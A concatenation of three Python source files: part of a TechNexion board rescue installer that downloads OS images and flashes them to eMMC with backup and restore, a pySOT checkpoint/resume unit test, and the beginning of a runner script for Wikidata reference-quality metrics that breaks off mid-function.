if 'bytes_written' in result:
pcent = float(int(result['bytes_written']) / total)
hashes = '#' * int(round(pcent * 40))
spaces = ' ' * (40 - len(hashes))
outstr = 'Percent: [{}] {}% ({}/{})'.format(hashes + spaces, int(round(pcent * 100)), _prettySize(int(result['bytes_written'])), _prettySize(total))
print(outstr, end=((' ' * (80 - len(outstr))) + '\r'))
else:
print('Processing: ...', end='\r')
def startstop_guiclientd(flag):
print('{} gui rescue client application...'.format('Start' if flag else 'Stop'))
subprocess.check_call(['systemctl', 'start' if flag else 'stop', 'guiclientd.service'])
def main():
def parseSOMInfo(path):
p = re.compile('\/(\w+)[_|-](\w+)\/(\w+)-(\w+)\/(.+)\.xz', re.IGNORECASE)
m = p.match(path)
if m:
return m.groups()
def parseFilename(fname):
if '-' in fname:
os, other = fname.split('-', 1)
else:
os, other = fname, ''
if '-' in other:
ver, extra = other.split('-', 1)
else:
ver, extra = other, ''
return os, ver, extra
menuResult = {}
tgtResult = {}
copyResult = {}
dlResult = {}
# step 0: find out the module and baseboard of the target device
print('Find target device cpu, and form-factor...')
cliSom = CliViewer()
cliSom.request({'cmd': 'info', 'target': 'som'})
if 'found_match' in cliSom.getResult():
form, cpu, baseboard = cliSom.getResult()['found_match'].split(',')
if cpu.find('-') != -1: cpu = cpu.split('-',1)[0]
print('Found: {} {} {}'.format(cpu, form, baseboard))
else:
form = cpu = baseboard = '' # same reference
print('Target Device SOM info not found.')
# step 1: request for list of download-able files from https://rescue.technexion.net/rescue/
# spider crawl through the url links to find all .xz files in sub directory links
print('Crawl through rescue server for xz files...')
crawlWeb('/', menuResult) # /pico-imx7/pi-070/
print('Find matching xz files for the target device...')
# step 2: find menu items that matches as cpu, form, but not baseboard
for k, v in sorted(menuResult.items()):
if (cpu.lower() in k.lower()) and (form.lower() in k.lower()):
continue
if not (cpu[0:4].lower() in k.lower()):
menuResult.pop(k)
else:
if form.lower() not in k.lower():
menuResult.pop(k)
if ('imx6ul' in cpu.lower()) or ('imx6ull' in cpu.lower()):
if k in menuResult:
menuResult.pop(k)
# step 3: ask user to choose the file to download
menus = [(i, k, v) for i, (k, v) in enumerate(sorted(menuResult.items()))]
print('{:>4} {:<8} {:<6} {:<8} {:<14} {:<14} {:<10} {:<8}'.format('#', 'cpu', 'form', 'board', 'display', 'os', 'ver', 'size'))
for menu in menus:
cliInfo = CliViewer()
cliInfo.request({'cmd': 'info', 'target': 'http://rescue.technexion.net', 'location': menu[1]})
if 'total_uncompressed' in cliInfo.getResult():
uncompsize = int(cliInfo.getResult()['total_uncompressed'])
elif 'total_size' in cliInfo.getResult():
uncompsize = int(cliInfo.getResult()['total_size'])
else:
uncompsize = 0
del cliInfo
if menu[1].endswith('.xz'):
form, cpu, board, disp, fname = parseSOMInfo(menu[1])
os, ver, extra = parseFilename(fname.rstrip('.xz'))
print('{:>4} {:<8} {:<6} {:<8} {:<14} {:<14} {:<10} {:<8}'.format(menu[0], cpu, form, board, disp, os, ver, _prettySize(uncompsize)))
while True:
srcNum = input('Choose a file to download ([Q]uit): ')
if srcNum.isdecimal() and (int(srcNum) >= 0 and int(srcNum) < len(menus)):
break
elif srcNum.isalpha() and srcNum.lower() == 'q':
startstop_guiclientd(1)
exit(1)
else:
print('Invalid Inputs')
# step 4a: get the total number of sectors for first booting partition.
cliPart = CliViewer()
cliPart.request({'cmd': 'info', 'target': 'emmc', 'location': 'partition'})
tgtResult.update(cliPart.getResult())
partblocks = parsePartitionSize(tgtResult)
tgtResult.clear()
del cliPart
# step 4b: request for list of targets storage device
cliTgt = CliViewer()
cliTgt.request({'cmd': 'info', 'target': 'emmc', 'location': 'disk'})
tgtResult.update(cliTgt.getResult())
del cliTgt
# step 5: ask user to choose the target to flash
targets = parseTargetList(tgtResult)
print('{:>4} {:<16} {:<24} {:<24}'.format('#', 'name', 'node path', 'disk size'))
for tgt in targets:
print('{:>4} {:<16} {:<24} {:<24}'.format(tgt[0], tgt[1], tgt[2]['device_node'], _prettySize(int(tgt[2]['size']) * 512)))
while True:
tgtNum = input('Choose a storage to flash ([Q]uit): ')
if tgtNum.isdecimal() and (int(tgtNum) >= 0 and int(tgtNum) < len(targets)):
break
elif tgtNum.isalpha() and tgtNum.lower() == 'q':
startstop_guiclientd(1)
exit(1)
else:
print('Invalid Inputs')
# step 6: make up the command to download and flash and execute it
cliDl = CliViewer()
# python3 view.py {download -u http://rescue.technexion.net/rescue/pico-imx6/dwarf-070/ubuntu-16.04.xz -t /dev/mmcblk2}
dlparam = {'cmd': 'download', 'dl_url': menus[int(srcNum)][2], 'tgt_filename': targets[int(tgtNum)][2]['device_node']}
print("Download {}, and flash to {}".format(menus[int(srcNum)][2], targets[int(tgtNum)][2]['device_node']))
# print("with cmd: {}".format(dlparam))
while True:
yn = input("[Y]es/[N]o ([Q]uit)? ")
if yn.lower() == 'yes' or yn.lower() == 'y':
# step 7: backup rescue system on target first
print('Backup Rescue System on Target Storage first...')
copyResult.clear()
cliBck = CliViewer()
bckparam = {'cmd': 'flash', 'src_filename': targets[int(tgtNum)][2]['device_node'], 'tgt_filename': '/tmp/rescue.img', 'src_total_sectors': '{}'.format(partblocks), 'chunk_size': '32768'}
cliBck.request(bckparam)
copyResult.update(cliBck.getResult())
del cliBck
break
elif yn.lower() == 'no' or yn.lower() == 'n' or yn.lower() == 'quit' or yn.lower() == 'q':
startstop_guiclientd(1)
exit(1)
# step 8: parse the result in a loop until result['status'] != 'processing'
endEvent = Event()
endEvent.clear()
resultThread = Thread(name='ResultThread', target=loopResult, args=(cliDl, endEvent))
resultThread.start()
cliDl.request(dlparam)
dlResult.update(cliDl.getResult())
time.sleep(1)
endEvent.set()
resultThread.join()
del cliDl
if dlResult['status'] == 'success':
print('Flash complete...', end=((' '*60) + '\n'))
else:
# step 9: restore rescue system on target storage if failed to flash
print('Flash failed, recover rescue system...', end=((' '*60) + '\n'))
copyResult.clear()
cliRecover = CliViewer()
recoverparam = {'cmd': 'flash', 'tgt_filename': targets[int(tgtNum)][2]['device_node'], 'src_filename': '/tmp/rescue.img', 'src_total_sectors': '{}'.format(partblocks), 'chunk_size': '32768'}
cliRecover.request(recoverparam)
copyResult.update(cliRecover.getResult())
del cliRecover
if 'status' in copyResult and copyResult['status'] == 'success':
print('Exit installer now, please try again later...')
else:
print('Critical Error, cannot restore rescue partition...')
exit(1)
# step 10: enable/disable the mmc boot option, and clear the boot partition if it is disabled
if 'androidthings' not in dlparam['dl_url']:
print('Disable mmc boot partition readonly...')
# python3 view.py {config mmc -c readonly -s enable/disable -n 1 /dev/mmcblk2}
cliCfg = CliViewer()
cfgparam = {'cmd': 'config', 'subcmd': 'mmc', 'config_id': 'readonly', \
'config_action': 'disable', 'boot_part_no': '1', 'target': dlparam['tgt_filename']}
cliCfg.request(cfgparam)
del cliCfg
cliFlash = CliViewer()
flashparam = {'cmd': 'flash', 'src_filename': '/dev/zero', 'tgt_filename': dlparam['tgt_filename'] + 'boot0'}
print('Clear mmc boot partition...')
endEvent = Event()
endEvent.clear()
resultThread = Thread(name='ResultThread', target=loopResult, args=(cliFlash, endEvent))
resultThread.start()
cliFlash.request(flashparam)
time.sleep(1)
endEvent.set()
resultThread.join()
print('Clear complete...', end=((' '*60) + '\n'))
del cliFlash
cliCfg = CliViewer()
# python3 view.py {config mmc -c bootpart -s enable/disable -n 1 -k 1 /dev/mmcblk2}
cfgparam = {'cmd': 'config', 'subcmd': 'mmc', 'config_id': 'bootpart', \
'config_action': 'enable' if 'androidthings' in dlparam['dl_url'] else 'disable', \
'boot_part_no': '1', 'send_ack': '1', 'target': dlparam['tgt_filename']}
print('{} mmc boot partition configuration...'.format('Enable' if 'androidthings' in dlparam['dl_url'] else 'Disable'))
cliCfg.request(cfgparam)
del cliCfg
# step 11: a message to tell user what to do next
print('Please set the boot jumper to BOOT MODE and reboot your board...')
if __name__ == "__main__":
startstop_guiclientd(0)
main()
|
test_controller.py | from pySOT.experimental_design import SymmetricLatinHypercube
from pySOT.strategy import DYCORSStrategy
from pySOT.surrogate import RBFInterpolant, CubicKernel, LinearTail
from pySOT.optimization_problems import Ackley
from pySOT.controller import CheckpointController
from poap.controller import SerialController
import numpy as np
import multiprocessing
import time
import os
import pytest
np.random.seed(0)
max_evals = 300
ackley = Ackley(dim=10)
fname = "checkpoint.pysot"
def check_strategy(controller):
"""Make sure the strategy object is correct."""
# Check the strategy object
assert controller.strategy.num_evals <= controller.strategy.max_evals
assert controller.strategy.phase == 2
assert controller.strategy.init_pending == 0
assert controller.strategy.pending_evals == 0
assert controller.strategy.X.shape == \
(controller.strategy.num_evals, ackley.dim)
assert controller.strategy.fX.shape == (controller.strategy.num_evals, 1)
assert controller.strategy.Xpend.shape == (0, ackley.dim)
assert len(controller.strategy.fevals) == controller.strategy.num_evals
# Check that all evaluations are in the surrogate model
assert controller.strategy.surrogate.num_pts == \
controller.strategy.num_evals
assert np.all(controller.strategy.X == controller.strategy.surrogate.X)
assert np.all(controller.strategy.fX == controller.strategy.surrogate.fX)
# Check that the strategy and controller have the same information
assert len(controller.fevals) == controller.strategy.num_evals
for i in range(controller.strategy.num_evals):
if controller.fevals[i].status == 'completed':
idx = np.where((controller.strategy.X ==
controller.fevals[i].params[0]).all(axis=1))[0]
assert(len(idx) == 1)
assert np.all(controller.fevals[i].params[0] ==
controller.strategy.X[idx, :])
assert controller.fevals[i].value == controller.strategy.fX[idx]
assert np.all(controller.fevals[i].params[0] <= ackley.ub)
assert np.all(controller.fevals[i].params[0] >= ackley.lb)
def test_checkpoint_serial():
if os.path.isfile(fname):
os.remove(fname)
# Run for 1 seconds and kill the controller
p = multiprocessing.Process(target=init_serial, args=())
p.start()
time.sleep(3)
p.terminate()
p.join()
# Resume the run
controller = SerialController(ackley.eval)
resume(controller)
def init_serial():
rbf = RBFInterpolant(
dim=ackley.dim, kernel=CubicKernel(),
tail=LinearTail(ackley.dim))
slhd = SymmetricLatinHypercube(
dim=ackley.dim, num_pts=2*(ackley.dim+1))
# Create a strategy and a controller
controller = SerialController(ackley.eval)
controller.strategy = DYCORSStrategy(
max_evals=max_evals, opt_prob=ackley, exp_design=slhd,
surrogate=rbf, asynchronous=True)
# Wrap controller in checkpoint object
controller = CheckpointController(controller, fname=fname)
controller.run()
def resume(controller):
# Wrap controller in checkpoint object
controller = CheckpointController(controller, fname=fname)
result = controller.resume()
assert(result.value < 2.0) # To make sure performance is the same
check_strategy(controller.controller)
# Try to resume again and make sure an exception is raised
with pytest.raises(IOError):
result = controller.run()
if __name__ == '__main__':
test_checkpoint_serial()
|
RQSS_Framework_Runner.py | import csv
import os
import sys
from argparse import ArgumentParser
from datetime import datetime
from multiprocessing.context import Process
from pathlib import Path
from typing import List, NamedTuple, Optional, Union
import pandas as pd
from Accuracy.LiteralSyntaxChecking import WikibaseRefLiteralSyntaxChecker
from Accuracy.TripleSemanticChecking import (FactReference,
RefTripleSemanticChecker)
from Accuracy.TripleSyntaxChecking import WikibaseRefTripleSyntaxChecker
from Availability.DereferencePossibility import DerefrenceExplorer
from Believability.HumanReferenceInItemChecking import *
from Completeness.ClassesPropertiesSchemaCompletenessChecking import *
from Conciseness.ReferenceSharingChecking import *
from Consistency.RefPropertiesConsistencyChecking import \
RefPropertiesConsistencyChecker
from Consistency.TriplesRangeConsistencyChecking import \
TriplesRangeConsistencyChecker
from Currency.ExternalURIsFreshnessChecking import *
from Currency.ReferenceFreshnessChecking import *
from EntitySchemaExtractor import EidRefSummary, RefedFactRef
from Licensing.LicenseExistanceChecking import LicenseChecker
from Objectivity.MultipleReferenceChecking import *
from Queries import RQSS_QUERIES
from Reputation.DNSBLBlacklistedChecking import DNSBLBlacklistedChecker
from Security.TLSExistanceChecking import TLSChecker
from Timeliness.ExternalURIsTimelinessChecking import *
from Volatility.ExternalURIsVolatilityChecking import *
def genargs(prog: Optional[str] = None) -> ArgumentParser:
parser = ArgumentParser(prog)
parser.add_argument(
"data_dir", help="Input data directory that includes initial collections like facts, properties, literals, external sources, etc.")
parser.add_argument(
"--endpoint", help="The local/public endpoint of the dataset for shex-based metrics", required=False)
parser.add_argument(
"--upper-date", help="The upper date (Format DD-MM-YYYY) limit for reivision history checker metrics. The deafult is now()", required=False, type=lambda d: datetime.datetime.strptime(d, "%d-%m-%Y"), default=datetime.datetime.now())
parser.add_argument(
"-o", "--output-dir", help="Output destination directory to store computed metrics details", default=os.getcwd()+os.sep+'rqss_framework_output')
parser.add_argument("-dp", "--dereferencing",
help="Compute the metric: Dereference Possibility of the External URIs", action='store_true')
parser.add_argument("-l", "--licensing",
help="Compute the metric: External Sources’ Datasets Licensing", action='store_true')
parser.add_argument("-sec", "--security",
help="Compute the metric: Link Security of the External URIs", action='store_true')
parser.add_argument("-rts", "--ref-triple-syntax",
help="Compute the metric: Syntactic Validity of Reference Triples", action='store_true')
parser.add_argument("-rls", "--ref-literal-syntax",
help="Compute the metric: Syntactic validity of references’ literals", action='store_true')
parser.add_argument("-rtm", "--ref-triple-semantic",
help="Compute the metric: Semantic validity of reference triples", action='store_true')
parser.add_argument("-rpc", "--ref-property-consistency",
help="Compute the metric: Consistency of references’ properties", action='store_true')
parser.add_argument("-rc", "--range-consistency",
help="Compute the metric: Range consistency of reference triples", action='store_true')
parser.add_argument("-rs", "--ref-sharing",
help="Compute the metric: Ratio of reference sharing", action='store_true')
parser.add_argument("-rdns", "--reputation",
help="Compute the metric: External sources’ domain reputation", action='store_true')
parser.add_argument("-mr", "--multiple-ref",
help="Compute the metric: Multiple references for facts", action='store_true')
parser.add_argument("-ha", "--human-added",
help="Compute the metric: Human-added references ratio", action='store_true')
parser.add_argument("-rf", "--ref-freshness",
help="Compute the metric: Freshness of fact referencing", action='store_true')
parser.add_argument("-ef", "--ext-uris-freshness",
help="Compute the metric: Freshness of external sources", action='store_true')
freshness_group = parser.add_argument_group(
title='options for computing freshness of external sources')
freshness_group.add_argument(
"--extract-google-cache", help="Set to extract google cache info for freshness of external sources", action='store_true')
parser.add_argument("-ev", "--ext-uris-volatility",
help="Compute the metric: Volatility of external sources", action='store_true')
parser.add_argument("-et", "--ext-uris-timeliness",
help="Compute the metric: Timeliness of external sources. The metric will use the results of the metrics Freshness of external sources and Volatility of external sources. Make sure the results of the two metric is in the --output-dir argument", action='store_true')
parser.add_argument("-cpsc", "--class-property-schema-completeness",
help="Compute the metric: Schema completeness of references", action='store_true')
return parser
def write_results_to_CSV(results: List[NamedTuple], output_file: str) -> None:
with open(output_file, 'w', newline='') as f:
if isinstance(results, str):
f.write(results)
return
w = csv.writer(
f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
# write header from NamedTuple fields
w.writerow([field for field in results[0]._fields])
for result in results:
row = ['<None>' if result._asdict()[field] == None else result._asdict()[
field] for field in result._fields]
w.writerow(row)
return
def compute_dereferencing(opts: ArgumentParser) -> int:
print('Started computing Metric: Dereference Possibility of the External URIs')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'external_uris.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'dereferencing.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'dereferencing_ratio.csv')
# reading the extracted External URIs
print('Reading data ...')
uris = []
try:
with open(input_data_file, encoding="utf8") as file:
for line in file:
uris.append(line.rstrip())
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"external_uris.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
deref_checker = DerefrenceExplorer(uris)
results = deref_checker.check_dereferencies()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(results, output_file_dist)
write_results_to_CSV(str(deref_checker), output_file_result)
print('Metric: Dereference Possibility of the External URIs results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Dereference Possibility of the External URIs, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_licensing(opts: ArgumentParser) -> int:
print('Started computing Metric: External Sources’ Datasets Licensing')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'external_uris.data')
output_file_dist = os.path.join(opts.output_dir + os.sep + 'licensing.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'licensing_ratio.csv')
# reading the extracted External URIs
print('Reading data ...')
uris = []
try:
with open(input_data_file, encoding="utf8") as file:
for line in file:
uris.append(line.rstrip())
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"external_uris.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
lic_checker = LicenseChecker(uris)
results = lic_checker.check_license_existance()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(results, output_file_dist)
write_results_to_CSV(str(lic_checker), output_file_result)
print('Metric: External Sources’ Datasets Licensing results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: External Sources’ Datasets Licensing, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_security(opts: ArgumentParser) -> int:
print('Started computing Metric: Link Security of the External URIs')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'external_uris.data')
output_file_dist = os.path.join(opts.output_dir + os.sep + 'security.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'security_ratio.csv')
# reading the extracted External URIs
print('Reading data ...')
uris = []
try:
with open(input_data_file, encoding="utf8") as file:
for line in file:
uris.append(line.rstrip())
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"external_uris.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
sec_checker = TLSChecker(uris)
results = sec_checker.check_support_tls()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(results, output_file_dist)
write_results_to_CSV(str(sec_checker), output_file_result)
print('Metric: Link Security of the External URIs results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Link Security of the External URIs, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_ref_triple_syntax(opts: ArgumentParser) -> int:
print('Started computing Metric: Syntactic Validity of Reference Triples')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'statement_nodes_uris.data')
output_file = os.path.join(
opts.output_dir + os.sep + 'ref_triple_syntax_result.csv')
# reading the statement nodes data
print('Reading data ...')
statements = []
try:
with open(input_data_file, encoding="utf8") as file:
for line in file:
statements.append(line.rstrip())
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"statement_nodes_uris.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
shex_checker = None
if(opts.endpoint):
shex_checker = WikibaseRefTripleSyntaxChecker(
statements, opts.endpoint, None)
results = shex_checker.check_shex_over_endpoint()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(str(shex_checker), output_file)
print('Metric: Syntactic Validity of Reference Triples results have been written in the file: {0}'.format(
output_file))
print('DONE. Metric: Syntactic Validity of Reference Triples, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_ref_literal_syntax(opts: ArgumentParser) -> int:
print('Started computing Metric: Syntactic validity of references’ literals')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'reference_literals.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'ref_literal_syntax.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'ref_literal_syntax_ratio.csv')
# reading the properties/literals
print('Reading data ...')
prop_values = {}
try:
with open(input_data_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
if row[0] not in prop_values.keys():
prop_values[str(row[0])] = []
prop_values[str(row[0])].append(row[1])
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"reference_literals.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
lit_checker = WikibaseRefLiteralSyntaxChecker(prop_values)
results = lit_checker.check_literals_regex()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(results, output_file_dist)
write_results_to_CSV(str(lit_checker), output_file_result)
print('Metric: Syntactic validity of references’ literals results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Syntactic validity of references’ literals, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_ref_triple_semantic(opts: ArgumentParser) -> int:
print('Started computing Metric: Semantic validity of reference triples')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'fact_ref_triples.data')
input_gold_standard_file = os.path.join(
opts.data_dir + os.sep + 'semantic_validity_gs.data')
output_file = os.path.join(
opts.output_dir + os.sep + 'semantic_validity.csv')
# reading the fact/reference triples
print('Reading data ...')
fact_refs = []
try:
with open(input_data_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
fact_refs.append(FactReference(row[0], row[1], row[2], row[3]))
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"fact_ref_triples.data"'))
exit(1)
# reading the gold standard set
print('Reading gold standard set ...')
gs_fact_refs = []
try:
with open(input_gold_standard_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
gs_fact_refs.append(FactReference(
row[0], row[1], row[2], row[3]))
except FileNotFoundError:
print("Error: Gold Standard Set file not found. Provide gold standard data file with name: {0} in data_dir".format(
'"semantic_validity_gs.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
results = RefTripleSemanticChecker(
gs_fact_refs, fact_refs).check_semantic_to_gold_standard()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(results, output_file)
print('Metric: Syntactic validity of references’ literals results have been written in the file: {0}'.format(
output_file))
print('DONE. Metric: Syntactic validity of references’ literals, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_ref_properties_consistency(opts: ArgumentParser) -> int:
print('Started computing Metric: Consistency of references’ properties')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'ref_properties.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'ref_properties_consistency.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'ref_properties_consistency_ratio.csv')
# reading the extracted External URIs
print('Reading data ...')
props = []
try:
with open(input_data_file, encoding="utf8") as file:
for line in file:
props.append(line.rstrip())
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"ref_properties.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
cons_checker = RefPropertiesConsistencyChecker(props)
results = cons_checker.check_reference_specificity_from_Wikdiata()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(results, output_file_dist)
write_results_to_CSV(str(cons_checker), output_file_result)
print('Metric: Consistency of references’ properties results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Consistency of references’ properties, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_range_consistency(opts: ArgumentParser) -> int:
print('Started computing Metric: Range consistency of reference triples')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'ref_properties_object_value.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'range_consistency.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'range_consistency_ratio.csv')
# reading the properties/literals
print('Reading data ...')
prop_values = {}
try:
with open(input_data_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
if row[0] not in prop_values.keys():
prop_values[str(row[0])] = []
prop_values[str(row[0])].append(row[1])
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"ref_properties_object_value.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
range_checker = TriplesRangeConsistencyChecker(prop_values)
results = range_checker.check_all_value_ranges()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(results, output_file_dist)
write_results_to_CSV(str(range_checker), output_file_result)
print('Metric: Range consistency of reference triples results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Range consistency of reference triples, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_ref_sharing_ratio(opts: ArgumentParser) -> int:
print('Started computing Metric: Ratio of reference sharing')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'ref_nodes_incomings.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'ref_sharing.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'ref_sharing_ratio.csv')
# reading the statement nodes data
print('Reading data ...')
ref_nodes = []
try:
with open(input_data_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
ref_nodes.append(RefNodeIncomings(row[0], row[1]))
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"ref_nodes_incomings.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
checker = ReferenceSharingChecker(ref_nodes)
shared_refs = checker.count_seperate_shared_references()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(shared_refs) > 0:
write_results_to_CSV(shared_refs, output_file_dist)
write_results_to_CSV(str(checker), output_file_result)
print('Metric: Ratio of reference sharing results have been written in the files: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Ratio of reference sharing, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_dnsbl_reputation(opts: ArgumentParser) -> int:
print('Started computing Metric: External sources’ domain reputation')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'external_uris.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'dnsbl_reputation.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'dnsbl_reputation_ratio.csv')
# reading the extracted External URIs
print('Reading data ...')
uris = []
try:
with open(input_data_file, encoding="utf8") as file:
for line in file:
uris.append(line.rstrip())
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"external_uris.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
dnsbl_checker = DNSBLBlacklistedChecker(uris)
results = dnsbl_checker.check_domain_blacklisted()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(results) > 0:
write_results_to_CSV(results, output_file_dist)
write_results_to_CSV(str(dnsbl_checker), output_file_result)
print('Metric: External sources’ domain reputation results have been written in the file: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: External sources’ domain reputation, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_multiple_referenced(opts: ArgumentParser) -> int:
print('Started computing Metric: Multiple references for facts')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'statement_node_ref_num.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'multiple_refs.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'multiple_refs_ratio.csv')
# reading the statement nodes data
print('Reading data ...')
statements = []
try:
with open(input_data_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
statements.append(StatementRefNum(row[0], row[1]))
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"statement_node_ref_num.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
checker = MultipleReferenceChecker(statements)
multiples = checker.count_seperate_multiple_referenced_statements()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(multiples) > 0:
write_results_to_CSV(multiples, output_file_dist)
write_results_to_CSV(str(checker), output_file_result)
print('Metric: Multiple references for facts results have been written in the files: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Multiple references for facts, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_human_added_references_per_item(opts: ArgumentParser) -> int:
print('Started computing Metric: Human-added references ratio')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'item_refed_facts.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'human_added.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'human_added_ratio.csv')
# reading the properties/literals
print('Reading data ...')
item_refed_facts = {}
try:
with open(input_data_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
if row[0] not in item_refed_facts.keys():
item_refed_facts[str(row[0])] = []
item_refed_facts[str(row[0])].append(row[1])
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"item_refed_facts.data"'))
exit(1)
# running the framework metric function
print('Running metric ...')
start_time = datetime.datetime.now()
human_added_checker = HumanReferenceInItemChecker(
item_refed_facts, opts.upper_date)
dist = human_added_checker.check_referenced_facts_human_added()
end_time = datetime.datetime.now()
# saving the results for presentation layer
if len(dist) > 0:
write_results_to_CSV(dist, output_file_dist)
write_results_to_CSV(str(human_added_checker), output_file_result)
print('Metric: Human-added references ratio results have been written in the files: {0} and {1}'.format(
output_file_dist, output_file_result))
print('DONE. Metric: Human-added references ratio, Duration: {0}'.format(
end_time - start_time))
return 0
def compute_referenced_facts_reference_freshness_per_item(opts: ArgumentParser) -> int:
print('Started computing Metric: Freshness of fact referencing')
input_data_file = os.path.join(
opts.data_dir + os.sep + 'item_refed_facts.data')
output_file_dist = os.path.join(
opts.output_dir + os.sep + 'fact_freshness.csv')
output_file_result = os.path.join(
opts.output_dir + os.sep + 'fact_freshness_ratio.csv')
# reading the properties/literals
print('Reading data ...')
item_refed_facts = {}
try:
with open(input_data_file, encoding="utf8") as file:
reader = csv.reader(file)
for row in reader:
if row[0] not in item_refed_facts.keys():
item_refed_facts[str(row[0])] = []
item_refed_facts[str(row[0])].append(row[1])
except FileNotFoundError:
print("Error: Input data file not found. Provide data file with name: {0} in data_dir".format(
'"item_refed_facts.data"'))
exit(1)
# running the framework metric function
